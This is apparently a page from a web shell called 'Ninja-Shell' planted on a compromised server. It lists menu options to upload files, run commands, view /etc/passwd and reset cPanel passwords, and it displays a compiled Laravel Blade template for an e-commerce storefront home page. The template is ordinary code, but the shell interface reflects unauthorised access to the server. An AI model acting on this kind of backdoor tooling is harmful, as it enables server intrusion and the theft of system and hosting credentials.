{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//arsu//storage//framework//views/6cf8af3df401d1630aabac47077e57740ea6e991.php
<?php $__env->startSection('content'); ?> <?php ($decimal_point_settings = !empty(\App\CPU\Helpers::get_business_settings('decimal_point_settings')) ? \App\CPU\Helpers::get_business_settings('decimal_point_settings') : 0); ?> <!-- slider area start --> <section class="tp-slider-area p-relative z-index-1"> <div class="tp-slider-active-2 swiper-container"> <div class="swiper-wrapper"> <?php echo $__env->make('web-views.partials._home-top-slider', ['main_banner' => $main_banner], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <div class="tp-swiper-dot tp-slider-2-dot"></div> </div> </section> <!-- slider area end --> <!-- banner area start --> <section class="tp-banner-area mt-20"> <div class="container-fluid tp-gx-40"> <div class="row tp-gx-20"> <?php $__currentLoopData = \App\Model\Banner::where('banner_type', 'Second Banner')->where('published', 1)->orderBy('id', 'desc')->take(3)->get(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $banner): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="col-xxl-4 col-lg-6"> <div class="tp-banner-item-2 p-relative z-index-1 grey-bg-2 mb-20 fix"> <div class="tp-banner-thumb-2 include-bg transition-3" data-background="<?php echo e(asset('storage/app/public/banner')); ?>/<?php echo e($banner['photo']); ?>"></div> <h3 class="tp-banner-title-2"> <a href="<?php echo e($banner->url); ?>"><?php echo e($banner->title); ?> <br> <?php echo e($banner->sub_title); ?></a> </h3> <div class="tp-banner-btn-2"> <a href="<?php echo e($banner->url); ?>" class="tp-btn tp-btn-border tp-btn-border-sm"><?php echo e($banner->button_text ?? \App\CPU\translate('Shop Now')); ?> <svg width="17" height="15" viewBox="0 0 17 15" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M16 7.49988L1 7.49988" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M9.9502 1.47554L16.0002 7.49954L9.9502 13.5245" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> </svg> </a> </div> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> </section> <!-- banner area end --> <!-- featured product area start --> <?php if($featured_products->count() > 0): ?> <section class="tp-category-area pb-95 pt-95"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="tp-section-title-wrapper-2 text-center mb-50"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate("Browse Our Featuring Products")); ?> <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"><?php echo e(\App\CPU\translate('featured_products')); ?></h3> </div> </div> </div> <div class="row"> <div class="col-xl-12"> <div class="tp-category-slider-2"> <div class="tp-category-slider-active-2 swiper-container mb-50"> <div class="swiper-wrapper"> <?php $__currentLoopData = $featured_products; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $product): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="tp-category-item-2 p-relative z-index-1 text-center swiper-slide"> <div class="tp-category-thumb-2 w-img"> <a href="<?php echo e(route('product', $product->slug)); ?>"> <img src="<?php echo e(\App\CPU\ProductManager::product_image_path('thumbnail')); ?>/<?php echo e($product['thumbnail']); ?>" onerror="this.src='<?php echo e(asset('public/assets/front-end/img/image-place-holder.png')); ?>'"> </a> </div> <div class="tp-category-content-2"> <span>From <?php echo e(\App\CPU\Helpers::currency_converter($product->unit_price - \App\CPU\Helpers::get_product_discount($product, $product->unit_price))); ?></span> <h3 class="tp-category-title-2"> <a href="<?php echo e(route('product', $product->slug)); ?>"> <?php echo e($product['name']); ?></a> </h3> <div class="tp-category-btn-2"> <?php ($rndnum=\Illuminate\Support\Str::uuid()); ?> <form id="add-to-cart-form-by-puuid-<?php echo e($product->id); ?>-<?php echo e($rndnum); ?>" class="mb-2"> <?php echo csrf_field(); ?> <input type="hidden" name="id" value="<?php echo e($product->id); ?>"> <input class="tp-cart-input input-number" type="hidden" name="quantity" value="<?php echo e($product->minimum_order_qty ?? 1); ?>" product-type="<?php echo e($product->product_type); ?>" min="<?php echo e($product->minimum_order_qty ?? 1); ?>" max="100" > </form> <button onclick="addToCart('add-to-cart-form-by-puuid-<?php echo e($product->id); ?>-<?php echo e($rndnum); ?>')" class="tp-btn tp-btn-border"><?php echo e(\App\CPU\translate('Add to Cart')); ?></button> </div> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <div class="swiper-scrollbar tp-swiper-scrollbar tp-swiper-scrollbar-drag"></div> </div> </div> </div> </div> </section> <?php endif; ?> <!-- category area end --> <!-- product area start --> <section class="tp-product-area pb-90"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="tp-section-title-wrapper-2 text-center mb-35"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate('Flash Deals & New Arrivals')); ?> <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"><?php echo e(\App\CPU\translate('Recommended for you')); ?></h3> </div> </div> </div> <div class="row"> <div class="col-xl-12"> <div class="tp-product-tab-2 tp-tab mb-50 text-center"> <nav> <div class="nav nav-tabs justify-content-center" id="nav-tab" role="tablist"> <?php ($tab_latest_products = $latest_products->take(12)); ?> <button class="nav-link active" id="nav-allCollection-tab" data-bs-toggle="tab" data-bs-target="#nav-allCollection" type="button" role="tab" aria-controls="nav-allCollection" aria-selected="true"> <?php echo e(\App\CPU\translate('All')); ?> <?php $all_collection_count = 0; $all_collection_count = count($tab_latest_products); if ($web_config['flash_deals']) { $all_collection_count += count($web_config['flash_deals']->products); } ?> <span class="tp-product-tab-tooltip"><?php echo e($all_collection_count); ?></span> </button> <?php if($web_config['flash_deals']): ?> <button class="nav-link" id="nav-shoe-tab" data-bs-toggle="tab" data-bs-target="#nav-shoe" type="button" role="tab" aria-controls="nav-shoe" aria-selected="false"><?php echo e(\App\CPU\translate('Flash Deals')); ?> <span class="tp-product-tab-tooltip"><?php echo e(count($web_config['flash_deals']->products)); ?></span> </button> <?php endif; ?> <?php if($tab_latest_products): ?> <button class="nav-link" id="nav-clothing-tab" data-bs-toggle="tab" data-bs-target="#nav-clothing" type="button" role="tab" aria-controls="nav-clothing" aria-selected="false"><?php echo e(\App\CPU\translate('New Arrivals')); ?> <span class="tp-product-tab-tooltip"><?php echo e(count($tab_latest_products)); ?></span> </button> <?php endif; ?> </div> </nav> </div> </div> </div> <div class="row"> <div class="col-xl-12"> <div class="tab-content" id="nav-tabContent"> <div class="tab-pane fade show active" id="nav-allCollection" role="tabpanel" aria-labelledby="nav-allCollection-tab" tabindex="0"> <div class="row"> <?php if($web_config['flash_deals']): ?> <?php $__currentLoopData = $web_config['flash_deals']->products; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $deal): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($deal->product): ?> <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $deal->product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php endif; ?> <?php if($tab_latest_products): ?> <?php $__currentLoopData = $tab_latest_products; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $product): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php endif; ?> </div> </div> <?php if($web_config['flash_deals']): ?> <div class="tab-pane fade" id="nav-shoe" role="tabpanel" aria-labelledby="nav-shoe-tab" tabindex="0"> <div class="row"> <?php $__currentLoopData = $web_config['flash_deals']->products; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $deal): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($deal->product): ?> <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $deal->product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <?php endif; ?> <?php if($tab_latest_products): ?> <div class="tab-pane fade" id="nav-clothing" role="tabpanel" aria-labelledby="nav-clothing-tab" tabindex="0"> <div class="row"> <?php $__currentLoopData = $tab_latest_products; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $product): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <?php endif; ?> </div> </div> </div> </div> </section> <!-- product area end --> <!-- Upcoming area start --> <section class="tp-seller-area pb-140--"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="tp-section-title-wrapper-2 mb-50"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate('Stay Up To Date')); ?> <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"> <?php echo e(\App\CPU\translate('Upcoming Products')); ?></h3> </div> </div> </div> <div class="row"> <?php $__currentLoopData = $upcoming_products; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $product): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="col-xl-3 col-lg-4 col-sm-6"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> </section> <!-- Upcoming area end --> <!-- Featured deal area start --> <?php if(count($web_config['featured_deals'])>0): ?> <section class="tp-featured-slider-area grey-bg-6 fix pt-95 pb-120"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="tp-section-title-wrapper-2 mb-50"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate('See the latest deals and exciting new offers')); ?>! <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"><?php echo e(\App\CPU\translate('Featured Deals')); ?></h3> </div> </div> </div> <div class="row"> <div class="col-xl-12"> <div class="tp-featured-slider"> <div class="tp-featured-slider-active swiper-container"> <div class="swiper-wrapper"> <?php $__currentLoopData = $web_config['featured_deals']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $product): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="tp-featured-item swiper-slide white-bg p-relative z-index-1"> <div class="tp-featured-thumb include-bg" data-background="<?php echo e(\App\CPU\ProductManager::product_image_path('thumbnail')); ?>/<?php echo e($product['thumbnail']); ?>"> </div> <div class="tp-featured-content"> <h3 class="tp-featured-title"> <a href="<?php echo e(route('product', $product->slug)); ?>"><?php echo e($product['name']); ?></a> </h3> <div class="tp-featured-price-wrapper"> <span class="tp-featured-price new-price"><?php echo e(\App\CPU\Helpers::currency_converter($product->unit_price - \App\CPU\Helpers::get_product_discount($product, $product->unit_price))); ?></span> <?php if($product->discount > 0): ?> <span class="tp-featured-price old-price"> <?php echo e(\App\CPU\Helpers::currency_converter($product->unit_price)); ?> </span> <?php endif; ?> </div> <div class="tp-product-rating-icon tp-product-rating-icon-2"> <?php ($overallRating = \App\CPU\ProductManager::get_overall_rating($product->reviews)); ?> <?php for($inc = 0; $inc < 5; $inc++): ?> <?php if($inc < $overallRating[0]): ?> <span><i class="fa-solid fa-star"></i></span> <?php else: ?> <span style="color: black"><i class="fa-solid fa-star"></i></span> <?php endif; ?> <?php endfor; ?> </div> <div class="tp-featured-btn"> <a href="<?php echo e(route('product', $product->slug)); ?>" class="tp-btn tp-btn-border tp-btn-border-sm"><?php echo e(\App\CPU\translate('Shop Now')); ?> <svg width="17" height="15" viewBox="0 0 17 15" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M16 7.49988L1 7.49988" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M9.9502 1.47554L16.0002 7.49954L9.9502 13.5245" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> </svg> </a> </div> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <div class="tp-featured-slider-arrow mt-45"> <button class="tp-featured-slider-button-prev"> <svg width="33" height="16" viewBox="0 0 33 16" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M1.97974 7.97534L31.9797 7.97534" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M8.02954 0.999999L0.999912 7.99942L8.02954 15" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> </svg> </button> <button class="tp-featured-slider-button-next"> <svg width="33" height="16" viewBox="0 0 33 16" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M30.9795 7.97534L0.979492 7.97534" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M24.9297 0.999999L31.9593 7.99942L24.9297 15" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> </svg> </button> </div> </div> </div> </div> </div> </section> <?php endif; ?> <!-- Featured deal area end --> <!-- Top Rated area start --> <section class="tp-trending-area pt-140 pb-150"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-6 col-lg-6"> <div class="tp-trending-wrapper"> <div class="tp-section-title-wrapper-2 mb-50"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate('More to Discover')); ?> <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"><?php echo e(\App\CPU\translate('Top Rated')); ?></h3> </div> <div class="tp-trending-slider"> <div class="tp-trending-slider-active swiper-container"> <div class="swiper-wrapper"> <?php $__currentLoopData = $topRated; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $top): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($top && $key < 3): ?> <div class="tp-trending-item swiper-slide"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $top->product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <div class="tp-trending-slider-dot tp-swiper-dot text-center mt-45"></div> </div> </div> </div> <div class="col-xl-4 col-lg-5 col-md-8 col-sm-10"> <?php ($single_banner = \App\Model\Banner::where('banner_type', 'Single Banner')->where('published', 1)->first()); ?> <div class="tp-trending-banner p-relative ml-35"> <div class="tp-trending-banner-thumb w-img include-bg" data-background="<?php echo e(asset('storage/app/public/banner')); ?>/<?php echo e($single_banner['photo']); ?>"> </div> <div class="tp-trending-banner-content"> <h3 class="tp-trending-banner-title"> <a onclick="location.href='<?php echo e($single_banner->url); ?>'"><?php echo e($single_banner->title); ?> <br> <?php echo e($single_banner->sub_title); ?></a> </h3> <div class="tp-trending-banner-btn"> <button onclick="location.href='<?php echo e($single_banner->url); ?>'" class="tp-btn tp-btn-border tp-btn-border-white tp-btn-border-white-sm"> <?php echo e($single_banner->button_text ?? 'Shop Now'); ?> <svg width="17" height="15" viewBox="0 0 17 15" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M16 7.5L1 7.5" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M9.9502 1.47541L16.0002 7.49941L9.9502 13.5244" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> </svg> </button> </div> </div> </div> </div> </div> </div> </section> <!-- Top Rated area end --> <!-- Best Sellings area start --> <section class="tp-seller-area pb-140"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="tp-section-title-wrapper-2 mb-50"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate('Most Sold This Week')); ?> <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"><?php echo e(\App\CPU\translate('Best Sellings')); ?></h3> </div> </div> </div> <div class="row"> <?php $__currentLoopData = $bestSellProduct; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $bestSell): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($bestSell && $key < 4): ?> <div class="col-xl-3 col-lg-4 col-sm-6"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $bestSell->product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <div class="row"> <div class="col-xl-12"> <div class="tp-seller-more text-center mt-10"> <a href="<?php echo e(route('products', ['data_from' => 'best-selling', 'page' => 1])); ?>" class="tp-btn tp-btn-border tp-btn-border-sm"><?php echo e(\App\CPU\translate('Show All in Best Seller')); ?></a> </div> </div> </div> </div> </section> <!-- Best Sellings area end --> <!-- Categorized product area start --> <?php $__currentLoopData = $home_categories; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $category): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <section class="tp-seller-area pb-140"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="tp-section-title-wrapper-2 mb-50"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate('Category')); ?> <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"><?php echo e(Str::limit($category['name'], 18)); ?></h3> </div> </div> </div> <div class="row"> <?php $__currentLoopData = $category['products']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $product): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($key < 4): ?> <div class="col-xl-3 col-lg-4 col-sm-6"> <?php echo $__env->make('web-views.partials._product-card-1', [ 'product' => $bestSell->product, 'decimal_point_settings' => $decimal_point_settings, ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <div class="row"> <div class="col-xl-12"> <div class="tp-seller-more text-center mt-10"> <a href="<?php echo e(route('products', ['id' => $category['id'], 'data_from' => 'category', 'page' => 1])); ?>" class="tp-btn tp-btn-border tp-btn-border-sm"><?php echo e(\App\CPU\translate(key: 'View More')); ?></a> </div> </div> </div> </div> </section> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <!-- Categorized product area end --> <!-- blog area start --> <section class="tp-blog-area pt-110 pb-120"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="tp-section-title-wrapper-2 mb-50 text-center"> <span class="tp-section-title-pre-2"> <?php echo e(\App\CPU\translate(key: 'Our Blog & News')); ?> <svg width="82" height="22" viewBox="0 0 82 22" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M81 14.5798C0.890564 -8.05914 -5.81154 0.0503902 5.00322 21" stroke="currentColor" stroke-opacity="0.3" stroke-width="2" stroke-miterlimit="3.8637" stroke-linecap="round" /> </svg> </span> <h3 class="tp-section-title-2"><?php echo e(\App\CPU\translate(key: 'Latest News & Articles')); ?></h3> </div> </div> </div> <div class="row"> <div class="col-xl-4 col-lg-4 col-md-6"> <div class="tp-blog-item-2 mb-40"> <div class="tp-blog-thumb-2 p-relative fix"> <a href="blog-details.html"> <img src="<?php echo e(asset('public/assets/front-end')); ?>/img/blog/2/blog-1.jpg" alt=""> </a> <div class="tp-blog-meta-date-2"> <span>14 July, 2023</span> </div> </div> <div class="tp-blog-content-2 has-thumbnail"> <div class="tp-blog-meta-2"> <span> <svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M12.636 8.14182L8.14808 12.6297C8.03182 12.7461 7.89375 12.8384 7.74178 12.9014C7.58981 12.9644 7.42691 12.9969 7.26239 12.9969C7.09788 12.9969 6.93498 12.9644 6.78301 12.9014C6.63104 12.8384 6.49297 12.7461 6.37671 12.6297L1 7.25926V1H7.25926L12.636 6.37671C12.8691 6.61126 13 6.92854 13 7.25926C13 7.58998 12.8691 7.90727 12.636 8.14182V8.14182Z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M4.12964 4.12988H4.13694" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> </svg> </span> <a href="#">Fashion, </a> <a href="#">Lift Style, </a> <a href="#">News</a> </div> <h3 class="tp-blog-title-2"> <a href="blog-details.html">The 'Boomerang' Employees Returning After Quitting</a> </h3> </div> </div> </div> <div class="col-xl-4 col-lg-4 col-md-6"> <div class="tp-blog-item-2 mb-40"> <div class="tp-blog-thumb-2 p-relative fix"> <a href="blog-details.html"> <img src="<?php echo e(asset('public/assets/front-end')); ?>/img/blog/2/blog-2.jpg" alt=""> </a> <div class="tp-blog-meta-date-2"> <span>28 May, 2023</span> </div> </div> <div class="tp-blog-content-2 has-thumbnail"> <div class="tp-blog-meta-2"> <span> <svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M12.636 8.14182L8.14808 12.6297C8.03182 12.7461 7.89375 12.8384 7.74178 12.9014C7.58981 12.9644 7.42691 12.9969 7.26239 12.9969C7.09788 12.9969 6.93498 12.9644 6.78301 12.9014C6.63104 12.8384 6.49297 12.7461 6.37671 12.6297L1 7.25926V1H7.25926L12.636 6.37671C12.8691 6.61126 13 6.92854 13 7.25926C13 7.58998 12.8691 7.90727 12.636 8.14182V8.14182Z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M4.12964 4.12988H4.13694" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> </svg> </span> <a href="#">Fashion, </a> <a href="#">Lift Style, </a> <a href="#">News</a> </div> <h3 class="tp-blog-title-2"> <a href="blog-details.html">Fast fashion: How clothes are linked to climate change</a> </h3> </div> </div> </div> <div class="col-xl-4 col-lg-4 col-md-6"> <div class="tp-blog-item-2 mb-40"> <div class="tp-blog-thumb-2 p-relative fix"> <a href="blog-details.html"> <img src="<?php echo e(asset('public/assets/front-end')); ?>/img/blog/2/blog-3.jpg" alt=""> </a> <div class="tp-blog-meta-date-2"> <span>01 April, 2023</span> </div> </div> <div class="tp-blog-content-2 has-thumbnail"> <div class="tp-blog-meta-2"> <span> <svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M12.636 8.14182L8.14808 12.6297C8.03182 12.7461 7.89375 12.8384 7.74178 12.9014C7.58981 12.9644 7.42691 12.9969 7.26239 12.9969C7.09788 12.9969 6.93498 12.9644 6.78301 12.9014C6.63104 12.8384 6.49297 12.7461 6.37671 12.6297L1 7.25926V1H7.25926L12.636 6.37671C12.8691 6.61126 13 6.92854 13 7.25926C13 7.58998 12.8691 7.90727 12.636 8.14182V8.14182Z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" /> <path d="M4.12964 4.12988H4.13694" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> </svg> </span> <a href="#">Fashion, </a> <a href="#">Lift Style, </a> <a href="#">News</a> </div> <h3 class="tp-blog-title-2"> <a href="blog-details.html">The Sound Of Fashion: Malcolm McLaren Words</a> </h3> </div> </div> </div> </div> <div class="row"> <div class="col-xl-12"> <div class="tp-blog-more-2 mt-10 text-center"> <a href="<?php echo e(route('blog')); ?>" class="tp-btn tp-btn-border tp-btn-border-sm"><?php echo e(\App\CPU\translate(key: 'Discover More')); ?></a> </div> </div> </div> </div> </section> <!-- blog area end --> <!-- feature area start --> <section class="tp-feature-area tp-feature-border-2 pb-80"> <div class="container"> <div class="tp-feature-inner-2"> <div class="row align-items-center"> <div class="col-xl-3 col-lg-3 col-md-6 col-sm-6"> <div class="tp-feature-item-2 d-flex align-items-start"> <div class="tp-feature-icon-2 mr-10"> <span> <svg width="33" height="27" viewBox="0 0 33 27" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M10.7222 1H31.5555V19.0556H10.7222V1Z" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M10.7222 7.94446H5.16667L1.00001 12.1111V19.0556H10.7222V7.94446Z" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M25.3055 26C23.3879 26 21.8333 24.4454 21.8333 22.5278C21.8333 20.6101 23.3879 19.0555 25.3055 19.0555C27.2232 19.0555 28.7778 20.6101 28.7778 22.5278C28.7778 24.4454 27.2232 26 25.3055 26Z" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M7.25001 26C5.33235 26 3.77778 24.4454 3.77778 22.5278C3.77778 20.6101 5.33235 19.0555 7.25001 19.0555C9.16766 19.0555 10.7222 20.6101 10.7222 22.5278C10.7222 24.4454 9.16766 26 7.25001 26Z" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> </svg> </span> </div> <div class="tp-feature-content-2"> <h3 class="tp-feature-title-2"><?php echo e(\App\CPU\translate('Fast Delivery')); ?></h3> <p><?php echo e(\App\CPU\translate('Fast Delivery all accross the country !')); ?></p> </div> </div> </div> <div class="col-xl-3 col-lg-3 col-md-6 col-sm-6"> <div class="tp-feature-item-2 d-flex align-items-start"> <div class="tp-feature-icon-2 mr-10"> <span> <svg width="21" height="35" viewBox="0 0 21 35" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M10.3636 1V34" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M17.8636 7H6.61365C5.22126 7 3.8859 7.55312 2.90134 8.53769C1.91677 9.52226 1.36365 10.8576 1.36365 12.25C1.36365 13.6424 1.91677 14.9777 2.90134 15.9623C3.8859 16.9469 5.22126 17.5 6.61365 17.5H14.1136C15.506 17.5 16.8414 18.0531 17.826 19.0377C18.8105 20.0223 19.3636 21.3576 19.3636 22.75C19.3636 24.1424 18.8105 25.4777 17.826 26.4623C16.8414 27.4469 15.506 28 14.1136 28H1.36365" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> </svg> </span> </div> <div class="tp-feature-content-2"> <h3 class="tp-feature-title-2"><?php echo e(\App\CPU\translate('Safe Payment')); ?></h3> <p><?php echo e(\App\CPU\translate('Pay Online Safely & Securely !')); ?></p> </div> </div> </div> <div class="col-xl-3 col-lg-3 col-md-6 col-sm-6"> <div class="tp-feature-item-2 d-flex align-items-start"> <div class="tp-feature-icon-2 mr-10"> <span> <svg width="31" height="30" viewBox="0 0 31 30" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <mask id="mask0_1211_583" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="0" y="0" width="31" height="30"> <path fill-rule="evenodd" clip-rule="evenodd" d="M0 0H30.0024V29.9998H0V0Z" 